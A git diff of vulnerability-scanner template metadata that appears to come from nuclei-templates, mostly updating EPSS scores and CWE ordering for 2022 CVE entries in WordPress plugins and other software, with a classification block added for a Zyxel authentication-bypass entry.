cpe:2.3:a:10web:spidercalendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0218.yaml b/http/cves/2022/CVE-2022-0218.yaml index fd64c0d284..59fc39ed41 100644 --- a/http/cves/2022/CVE-2022-0218.yaml +++ b/http/cves/2022/CVE-2022-0218.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0218 cwe-id: CWE-79 epss-score: 0.03872 - epss-percentile: 0.90766 + epss-percentile: 0.90883 cpe: cpe:2.3:a:codemiq:wordpress_email_template_designer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0220.yaml b/http/cves/2022/CVE-2022-0220.yaml index e60e7817f2..abde1bb94c 100644 --- a/http/cves/2022/CVE-2022-0220.yaml +++ b/http/cves/2022/CVE-2022-0220.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-0220 cwe-id: CWE-116 epss-score: 0.00124 - epss-percentile: 0.46073 + epss-percentile: 0.4643 cpe: cpe:2.3:a:welaunch:wordpress_gdpr\&ccpa:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0234.yaml b/http/cves/2022/CVE-2022-0234.yaml index dd7ca01825..101e3e5113 100644 --- a/http/cves/2022/CVE-2022-0234.yaml +++ b/http/cves/2022/CVE-2022-0234.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0234 cwe-id: CWE-79 - epss-score: 0.00133 - epss-percentile: 0.47722 + epss-score: 0.001 + epss-percentile: 0.40828 cpe: cpe:2.3:a:pluginus:woocs:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml index a91f6d4685..a7e3b5dede 100644 --- a/http/cves/2022/CVE-2022-0271.yaml +++ b/http/cves/2022/CVE-2022-0271.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0271 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45304 + epss-score: 0.00141 + epss-percentile: 0.49543 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0281.yaml b/http/cves/2022/CVE-2022-0281.yaml index cdc399aafb..78534b0923 100644 --- a/http/cves/2022/CVE-2022-0281.yaml +++ b/http/cves/2022/CVE-2022-0281.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-0281 cwe-id: CWE-200 - epss-score: 0.00492 - epss-percentile: 0.7314 + epss-score: 0.0051 + epss-percentile: 0.73893 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0288.yaml b/http/cves/2022/CVE-2022-0288.yaml index 59ccc4121a..97ad6e8c1e 100644 --- a/http/cves/2022/CVE-2022-0288.yaml +++ b/http/cves/2022/CVE-2022-0288.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0288 cwe-id: CWE-79 - epss-score: 0.00141 - epss-percentile: 0.49173 + epss-score: 0.00106 + epss-percentile: 0.42795 cpe: cpe:2.3:a:ad_inserter_pro_project:ad_inserter_pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml index cf0bc52b82..f1983f316b 100644 --- a/http/cves/2022/CVE-2022-0342.yaml +++ b/http/cves/2022/CVE-2022-0342.yaml @@ -5,13 +5,24 @@ info: author: SleepingBag945,Powerexploit severity: critical description: | - An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device. + An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device. reference: - https://github.com/gobysec/GobyVuls/blob/master/CVE-2022-0342.md - https://nvd.nist.gov/vuln/detail/CVE-2022-0342 + - https://www.zyxel.com/support/Zyxel-security-advisory-for-authentication-bypass-vulnerability-of-firewalls.shtml + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0342 + cwe-id: CWE-287 + epss-score: 0.27759 + epss-percentile: 0.9625 + cpe: cpe:2.3:o:zyxel:usg40_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: zyxel + product: usg40_firmware fofa-query: body="/2FA-access.cgi" && body="zyxel zyxel_style1" tags: cve,cve2022,zyxel,auth-bypass,router diff --git a/http/cves/2022/CVE-2022-0346.yaml b/http/cves/2022/CVE-2022-0346.yaml index 5f0345c088..6af58542d2 100644 --- a/http/cves/2022/CVE-2022-0346.yaml +++ b/http/cves/2022/CVE-2022-0346.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0346 cwe-id: CWE-79 epss-score: 0.00099 - epss-percentile: 0.40272 + epss-percentile: 0.40575 cpe: cpe:2.3:a:xmlsitemapgenerator:xml_sitemap_generator:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml index 264b477420..f7d2268b38 100644 --- a/http/cves/2022/CVE-2022-0349.yaml +++ b/http/cves/2022/CVE-2022-0349.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0349 cwe-id: CWE-89 - epss-score: 0.01307 - epss-percentile: 0.84219 + epss-score: 0.02001 + epss-percentile: 0.87553 cpe: cpe:2.3:a:wpdeveloper:notificationx:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml index 5507b7f9ce..277c0e7bb8 100644 --- a/http/cves/2022/CVE-2022-0378.yaml +++ b/http/cves/2022/CVE-2022-0378.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0378 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40521 + epss-percentile: 0.40828 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0381.yaml b/http/cves/2022/CVE-2022-0381.yaml index bb22e2e1af..15940a1aaa 100644 --- a/http/cves/2022/CVE-2022-0381.yaml +++ b/http/cves/2022/CVE-2022-0381.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0381 cwe-id: CWE-79 epss-score: 0.00218 - epss-percentile: 0.59071 + epss-percentile: 0.59471 cpe: cpe:2.3:a:embed_swagger_project:embed_swagger:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0412.yaml b/http/cves/2022/CVE-2022-0412.yaml index 5f6fc921df..8b7cc6f0d0 100644 --- a/http/cves/2022/CVE-2022-0412.yaml +++ b/http/cves/2022/CVE-2022-0412.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0412 cwe-id: CWE-89 - epss-score: 0.02963 - epss-percentile: 0.89567 + epss-score: 0.03999 + epss-percentile: 0.91015 cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml index 207b99b64d..d1157ccae1 100644 --- a/http/cves/2022/CVE-2022-0415.yaml +++ b/http/cves/2022/CVE-2022-0415.yaml @@ -15,9 +15,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-0415 - cwe-id: CWE-20,CWE-434 - epss-score: 0.27369 - epss-percentile: 0.96168 + cwe-id: CWE-434,CWE-20 + epss-score: 0.1488 + epss-percentile: 0.95168 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0422.yaml b/http/cves/2022/CVE-2022-0422.yaml index 986bbb9ee5..c6ed3dbe5c 100644 --- a/http/cves/2022/CVE-2022-0422.yaml +++ b/http/cves/2022/CVE-2022-0422.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0422 cwe-id: CWE-79 - epss-score: 0.00133 - epss-percentile: 0.47722 + epss-score: 0.001 + epss-percentile: 0.40828 cpe: cpe:2.3:a:videousermanuals:white_label_cms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0432.yaml b/http/cves/2022/CVE-2022-0432.yaml index 8dc3b1c1fe..cf89fe4a19 100644 --- a/http/cves/2022/CVE-2022-0432.yaml +++ b/http/cves/2022/CVE-2022-0432.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0432 cwe-id: CWE-1321 epss-score: 0.001 - epss-percentile: 0.40521 + epss-percentile: 0.40828 cpe: cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0434.yaml b/http/cves/2022/CVE-2022-0434.yaml index 1640243c18..1dd8853863 100644 --- a/http/cves/2022/CVE-2022-0434.yaml +++ b/http/cves/2022/CVE-2022-0434.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0434 cwe-id: CWE-89 - epss-score: 0.02274 - epss-percentile: 0.88217 + epss-score: 0.04673 + epss-percentile: 0.91679 cpe: cpe:2.3:a:a3rev:page_view_count:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0437.yaml b/http/cves/2022/CVE-2022-0437.yaml index ddefe92a4b..1af55562bb 100644 --- a/http/cves/2022/CVE-2022-0437.yaml +++ b/http/cves/2022/CVE-2022-0437.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0437 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40521 + epss-percentile: 0.40828 cpe: cpe:2.3:a:karma_project:karma:*:*:*:*:*:node.js:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0441.yaml b/http/cves/2022/CVE-2022-0441.yaml index 197bc2aabf..0888a1da36 100644 --- a/http/cves/2022/CVE-2022-0441.yaml +++ b/http/cves/2022/CVE-2022-0441.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0441 cwe-id: CWE-269 - epss-score: 0.37209 - epss-percentile: 0.96672 + epss-score: 0.35682 + epss-percentile: 0.96645 cpe: cpe:2.3:a:stylemixthemes:masterstudy_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0482.yaml b/http/cves/2022/CVE-2022-0482.yaml index 819fb3bd5c..49395ff72c 100644 --- a/http/cves/2022/CVE-2022-0482.yaml +++ b/http/cves/2022/CVE-2022-0482.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.1 cve-id: CVE-2022-0482 cwe-id: CWE-359,CWE-863 - epss-score: 0.02425 - epss-percentile: 0.88566 + epss-score: 0.03299 + epss-percentile: 0.902 cpe: cpe:2.3:a:easyappointments:easyappointments:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0535.yaml b/http/cves/2022/CVE-2022-0535.yaml index ebf16bbaa9..f1f6386ec6 100644 --- a/http/cves/2022/CVE-2022-0535.yaml +++ b/http/cves/2022/CVE-2022-0535.yaml @@ -19,8 +19,8 @@ info: cvss-score: 4.8 cve-id: CVE-2022-0535 cwe-id: CWE-79 - epss-score: 0.00112 - epss-percentile: 0.43647 + epss-score: 0.00084 + epss-percentile: 0.34941 cpe: cpe:2.3:a:e2pdf:e2pdf:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0540.yaml b/http/cves/2022/CVE-2022-0540.yaml index 16add28a26..7a86530007 100644 --- a/http/cves/2022/CVE-2022-0540.yaml +++ b/http/cves/2022/CVE-2022-0540.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0540 cwe-id: CWE-287 - epss-score: 0.16241 - epss-percentile: 0.95289 + epss-score: 0.13951 + epss-percentile: 0.95021 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index d5ce387354..3663873a1c 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.1 cve-id: CVE-2022-0591 cwe-id: CWE-918 - epss-score: 0.00694 - epss-percentile: 0.77706 + epss-score: 0.02876 + epss-percentile: 0.89579 cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0594.yaml b/http/cves/2022/CVE-2022-0594.yaml index 5723836d28..fb88b175f0 100644 --- a/http/cves/2022/CVE-2022-0594.yaml +++ b/http/cves/2022/CVE-2022-0594.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0594 cwe-id: CWE-863 epss-score: 0.00257 - epss-percentile: 0.62773 + epss-percentile: 0.63186 cpe: cpe:2.3:a:shareaholic:shareaholic:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0595.yaml b/http/cves/2022/CVE-2022-0595.yaml index d7f8306b69..5b6b89f458 100644 --- a/http/cves/2022/CVE-2022-0595.yaml +++ b/http/cves/2022/CVE-2022-0595.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-0595 cwe-id: CWE-79 - epss-score: 0.00135 - epss-percentile: 0.48139 + epss-score: 0.00117 + epss-percentile: 0.45179 cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0599.yaml b/http/cves/2022/CVE-2022-0599.yaml index 78ad436fba..6f618eae0e 100644 --- a/http/cves/2022/CVE-2022-0599.yaml +++ b/http/cves/2022/CVE-2022-0599.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0599 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45304 + epss-score: 0.00122 + epss-percentile: 0.46081 cpe: cpe:2.3:a:mapping_multiple_urls_redirect_same_page_project:mapping_multiple_urls_redirect_same_page:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0653.yaml b/http/cves/2022/CVE-2022-0653.yaml index 9cd9df8a14..1cd7dfaab1 100644 --- a/http/cves/2022/CVE-2022-0653.yaml +++ b/http/cves/2022/CVE-2022-0653.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0653 cwe-id: CWE-79 - epss-score: 0.00274 - epss-percentile: 0.64008 + epss-score: 0.00206 + epss-percentile: 0.58248 cpe: cpe:2.3:a:cozmoslabs:profile_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0656.yaml b/http/cves/2022/CVE-2022-0656.yaml index 0dd691838f..d7aa045e49 100644 --- a/http/cves/2022/CVE-2022-0656.yaml +++ b/http/cves/2022/CVE-2022-0656.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-0656 cwe-id: CWE-552 - epss-score: 0.00641 - epss-percentile: 0.76583 + epss-score: 0.00651 + epss-percentile: 0.77061 cpe: cpe:2.3:a:webtoprint:web_to_print_shop\:udraw:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml index e2424de0d1..7a3b6d2a83 100644 --- a/http/cves/2022/CVE-2022-0660.yaml +++ b/http/cves/2022/CVE-2022-0660.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-0660 cwe-id: CWE-209 - epss-score: 0.00654 - epss-percentile: 0.76848 + epss-score: 0.00719 + epss-percentile: 0.78386 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml index 98be7352f2..674c8386c0 100644 --- a/http/cves/2022/CVE-2022-0678.yaml +++ b/http/cves/2022/CVE-2022-0678.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0678 cwe-id: CWE-79 - epss-score: 0.00135 - epss-percentile: 0.4804 + epss-score: 0.00118 + epss-percentile: 0.45372 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0679.yaml b/http/cves/2022/CVE-2022-0679.yaml index fd1fce7c9e..34367c76d4 100644 --- a/http/cves/2022/CVE-2022-0679.yaml +++ b/http/cves/2022/CVE-2022-0679.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0679 cwe-id: CWE-22 - epss-score: 0.02484 - epss-percentile: 0.88704 + epss-score: 0.03328 + epss-percentile: 0.90233 cpe: cpe:2.3:a:narnoo_distributor_project:narnoo_distributor:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0692.yaml b/http/cves/2022/CVE-2022-0692.yaml index 1b86f1d7bc..66ad41df20 100644 --- a/http/cves/2022/CVE-2022-0692.yaml +++ b/http/cves/2022/CVE-2022-0692.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0692 cwe-id: CWE-601 - epss-score: 0.00133 - epss-percentile: 0.47722 + epss-score: 0.001 + epss-percentile: 0.40828 cpe: cpe:2.3:a:alltube_project:alltube:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml index 92d6328b43..33503b491e 100644 --- a/http/cves/2022/CVE-2022-0693.yaml +++ b/http/cves/2022/CVE-2022-0693.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0693 cwe-id: CWE-89 - epss-score: 0.01196 - epss-percentile: 0.83424 + epss-score: 0.01391 + epss-percentile: 0.84869 cpe: cpe:2.3:a:devbunch:master_elements:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0735.yaml b/http/cves/2022/CVE-2022-0735.yaml index be212e1c03..5dc69aace7 100644 --- a/http/cves/2022/CVE-2022-0735.yaml +++ b/http/cves/2022/CVE-2022-0735.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0735 cwe-id: CWE-863 - epss-score: 0.02744 - epss-percentile: 0.89212 + epss-score: 0.03163 + epss-percentile: 0.89998 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml index 4123edc774..5ec0d44bdb 100644 --- a/http/cves/2022/CVE-2022-0747.yaml +++ b/http/cves/2022/CVE-2022-0747.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0747 cwe-id: CWE-89 - epss-score: 0.011 - epss-percentile: 0.82632 + epss-score: 0.01617 + epss-percentile: 0.86018 cpe: cpe:2.3:a:quantumcloud:infographic_maker:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0760.yaml b/http/cves/2022/CVE-2022-0760.yaml index b8940f94fd..19228c4eae 100644 --- a/http/cves/2022/CVE-2022-0760.yaml +++ b/http/cves/2022/CVE-2022-0760.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0760 cwe-id: CWE-89 - epss-score: 0.011 - epss-percentile: 0.82632 + epss-score: 0.01617 + epss-percentile: 0.86018 cpe: cpe:2.3:a:quantumcloud:simple_link_directory:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml index 3b1954d1ed..916dee41de 100644 --- a/http/cves/2022/CVE-2022-0769.yaml +++ b/http/cves/2022/CVE-2022-0769.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0769 cwe-id: CWE-89 - epss-score: 0.01196 - epss-percentile: 0.83424 + epss-score: 0.01391 + epss-percentile: 0.84869 cpe: cpe:2.3:a:usersultra:users_ultra:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0773.yaml b/http/cves/2022/CVE-2022-0773.yaml index 7061f1efa8..1bdf241868 100644 --- a/http/cves/2022/CVE-2022-0773.yaml +++ b/http/cves/2022/CVE-2022-0773.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0773 cwe-id: CWE-89 - epss-score: 0.02077 - epss-percentile: 0.87641 + epss-score: 0.02409 + epss-percentile: 0.8868 cpe: cpe:2.3:a:documentor_project:documentor:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0776.yaml b/http/cves/2022/CVE-2022-0776.yaml index 3490241d59..05fc0a9096 100644 --- a/http/cves/2022/CVE-2022-0776.yaml +++ b/http/cves/2022/CVE-2022-0776.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0776 cwe-id: CWE-79 - epss-score: 0.00133 - epss-percentile: 0.47722 + epss-score: 0.001 + epss-percentile: 0.40828 cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:* metadata: vendor: revealjs diff --git a/http/cves/2022/CVE-2022-0781.yaml b/http/cves/2022/CVE-2022-0781.yaml index bb2f339f37..bc861fb3b7 100644 --- a/http/cves/2022/CVE-2022-0781.yaml +++ b/http/cves/2022/CVE-2022-0781.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0781 cwe-id: CWE-89 epss-score: 0.00974 - epss-percentile: 0.81449 + epss-percentile: 0.81649 cpe: cpe:2.3:a:nirweb:nirweb_support:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0784.yaml b/http/cves/2022/CVE-2022-0784.yaml index bb6398b08d..ffd7e66732 100644 --- a/http/cves/2022/CVE-2022-0784.yaml +++ b/http/cves/2022/CVE-2022-0784.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0784 cwe-id: CWE-89 - epss-score: 0.02077 - epss-percentile: 0.87641 + epss-score: 0.03202 + epss-percentile: 0.90064 cpe: cpe:2.3:a:title_experiments_free_project:title_experiments_free:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0785.yaml b/http/cves/2022/CVE-2022-0785.yaml index 26ab8912d7..cbe80d6e02 100644 --- a/http/cves/2022/CVE-2022-0785.yaml +++ b/http/cves/2022/CVE-2022-0785.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0785 cwe-id: CWE-89 - epss-score: 0.02077 - epss-percentile: 0.87641 + epss-score: 0.02409 + epss-percentile: 0.8868 cpe: cpe:2.3:a:daily_prayer_time_project:daily_prayer_time:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml index 1cf1a32d17..5b9a58e95d 100644 --- a/http/cves/2022/CVE-2022-0786.yaml +++ b/http/cves/2022/CVE-2022-0786.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0786 cwe-id: CWE-89 - epss-score: 0.01851 - epss-percentile: 0.8685 + epss-score: 0.02077 + epss-percentile: 0.87795 cpe: cpe:2.3:a:iqonic:kivicare:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0788.yaml b/http/cves/2022/CVE-2022-0788.yaml index 8f24319a60..62ae2cf60e 100644 --- a/http/cves/2022/CVE-2022-0788.yaml +++ b/http/cves/2022/CVE-2022-0788.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0788 cwe-id: CWE-89 epss-score: 0.02077 - epss-percentile: 0.87641 + epss-percentile: 0.87795 cpe: cpe:2.3:a:wpmet:wp_fundraising_donation_and_crowdfunding_platform:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0817.yaml b/http/cves/2022/CVE-2022-0817.yaml index 71a3931987..361fc90a2c 100644 --- a/http/cves/2022/CVE-2022-0817.yaml +++ b/http/cves/2022/CVE-2022-0817.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0817 cwe-id: CWE-89 epss-score: 0.02077 - epss-percentile: 0.87641 + epss-percentile: 0.87795 cpe: cpe:2.3:a:badgeos:badgeos:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0824.yaml b/http/cves/2022/CVE-2022-0824.yaml index 6824c4defe..5dd9962e4c 100644 --- a/http/cves/2022/CVE-2022-0824.yaml +++ b/http/cves/2022/CVE-2022-0824.yaml @@ -16,9 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-0824 - cwe-id: CWE-284,CWE-863 - epss-score: 0.97243 - epss-percentile: 0.99757 + cwe-id: CWE-863,CWE-284 + epss-score: 0.97276 + epss-percentile: 0.99802 cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index 76b3b0a8d3..d11db07585 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0826 cwe-id: CWE-89 epss-score: 0.02077 - epss-percentile: 0.87641 + epss-percentile: 0.87795 cpe: cpe:2.3:a:wp-video-gallery-free_project:wp-video-gallery-free:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0827.yaml b/http/cves/2022/CVE-2022-0827.yaml index 3e227b750b..89308642ad 100644 --- a/http/cves/2022/CVE-2022-0827.yaml +++ b/http/cves/2022/CVE-2022-0827.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0827 cwe-id: CWE-89 - epss-score: 0.01851 - epss-percentile: 0.8685 + epss-score: 0.02077 + epss-percentile: 0.87795 cpe: cpe:2.3:a:presspage:bestbooks:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml index a66e61b458..6b6e77545f 100644 --- a/http/cves/2022/CVE-2022-0846.yaml +++ b/http/cves/2022/CVE-2022-0846.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0846 cwe-id: CWE-89 - epss-score: 0.02077 - epss-percentile: 0.87641 + epss-score: 0.03202 + epss-percentile: 0.90064 cpe: cpe:2.3:a:speakout\!_email_petitions_project:speakout\!_email_petitions:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml index 419e25b6cf..e22352aa26 100644 --- a/http/cves/2022/CVE-2022-0864.yaml +++ b/http/cves/2022/CVE-2022-0864.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0864 cwe-id: CWE-79 - epss-score: 0.00359 - epss-percentile: 0.68676 + epss-score: 0.00309 + epss-percentile: 0.66565 cpe: cpe:2.3:a:updraftplus:updraftplus:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0867.yaml b/http/cves/2022/CVE-2022-0867.yaml index 113b66774b..8becb7ef6f 100644 --- a/http/cves/2022/CVE-2022-0867.yaml +++ b/http/cves/2022/CVE-2022-0867.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0867 cwe-id: CWE-89 - epss-score: 0.04152 - epss-percentile: 0.9107 + epss-score: 0.05163 + epss-percentile: 0.92089 cpe: cpe:2.3:a:reputeinfosystems:pricing_table:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0869.yaml b/http/cves/2022/CVE-2022-0869.yaml index 2b214a1f50..1ea0d129ea 100644 --- a/http/cves/2022/CVE-2022-0869.yaml +++ b/http/cves/2022/CVE-2022-0869.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0869 cwe-id: CWE-601 - epss-score: 0.00153 - epss-percentile: 0.50846 + epss-score: 0.00115 + epss-percentile: 0.44768 cpe: 